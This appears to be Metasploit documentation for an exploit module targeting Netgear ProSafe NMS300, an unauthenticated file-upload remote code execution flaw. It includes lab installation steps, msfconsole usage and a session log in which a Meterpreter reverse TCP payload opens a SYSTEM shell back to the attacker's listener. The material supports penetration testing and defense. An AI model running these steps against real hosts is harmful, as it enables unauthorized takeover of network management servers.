metasploit-gs/documentation/modules/exploit/windows/http/netgear_nms_rce.md

## Vulnerable Application
Netgear's ProSafe NMS300 is a network management utility that runs on Windows systems.
The application has multiple vulnerabilities that allow an unauthenticated remote
attacker to execute code as the SYSTEM user. The vulnerabilities include authentication bypass,
SQL injection, arbitrary file upload, and privilege escalation across various versions.
This module spawns a Meterpreter session by chaining two specific
vulnerabilities in the `FileUploadController` and `MyHandlerInterceptor` classes.
This module has been tested with versions `1.5.0.2`, `1.4.0.17`, `1.7.0.12`, and `1.7.0.1`.
Note: The module should also work against version `1.1.0.13`, but this was not tested.
## Testing
To install the vulnerable version, follow the steps below:
1. Download the [installer](https://www.netgear.com/support/product/nms300#download) for versions below **v1.7.0.22**.
2. Follow installation steps.
After these steps the ProSAFE NMS web panel will be exposed at `http://localhost:8080/`.
## Verification Steps
1. Start `msfconsole`
2. Do: `use exploit/windows/http/netgear_nms_rce`
3. Do: `set RHOST [IP]`
4. Do: `set RPORT [PORT]`
5. Do: `exploit`
## Options
## Scenarios
```
msf6 > use exploit/windows/http/netgear_nms_rce
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/http/netgear_nms_rce) > set rhosts 192.168.56.104
rhosts => 192.168.56.104
msf6 exploit(windows/http/netgear_nms_rce) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf6 exploit(windows/http/netgear_nms_rce) > run
[*] Started reverse TCP handler on 192.168.56.1:4444
[*] 192.168.56.104:8080 - Uploading payload...
[+] 192.168.56.104:8080 - Payload uploaded successfully
[*] 192.168.56.104:8080 - Executing payload...
[*] Sending stage (175686 bytes) to 192.168.56.104
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.104:50133) at 2023-08-02 22:40:21 +0200
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
```